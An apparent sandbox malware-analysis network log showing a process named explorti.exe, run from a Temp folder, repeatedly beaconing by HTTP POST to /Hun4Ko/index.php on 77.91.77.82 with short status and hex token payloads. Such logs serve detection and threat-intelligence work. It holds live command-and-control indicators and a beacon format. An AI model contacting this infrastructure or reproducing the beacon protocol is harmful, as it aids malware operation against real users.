                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:08.563765049 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                63192.168.2.44980577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:08.684226990 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:09.383009911 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                64192.168.2.44980677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:09.391089916 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:10.115803003 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                65192.168.2.44980777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:10.230770111 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:10.952558994 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                66192.168.2.44980977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:11.074727058 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:11.784451962 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:24:11.792953014 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:12.013389111 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                67192.168.2.44981077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:12.142246962 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:12.843554020 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:12 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:24:12.846513987 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:13.068444014 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:12 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                68192.168.2.44981177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:13.196228981 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:13.904289961 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                69192.168.2.44981277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:13.915349007 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:14.654329062 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                70192.168.2.44981377.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:14.778239965 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:15.479491949 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                71192.168.2.44981477.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:15.487858057 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:16.181190014 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                72192.168.2.44981577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:16.315742016 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:17.025351048 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                73192.168.2.44981677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:17.033828974 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:17.765649080 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                74192.168.2.44981777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:17.888556004 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:18.598496914 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                75192.168.2.44981877.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:18.607115030 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:19.328160048 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                76192.168.2.44981977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:19.453387976 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:20.178311110 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                77192.168.2.44982077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:20.188591957 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:20.883038998 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                78192.168.2.44982177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:20.997517109 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:21.690491915 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:21 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                79192.168.2.44982277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:21.698688984 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:22.412617922 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                80192.168.2.44982377.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:22.527880907 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:23.234215021 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                81192.168.2.44982477.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:23.243453979 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:23.959229946 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                82192.168.2.44982577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:24.077578068 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:24.788667917 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
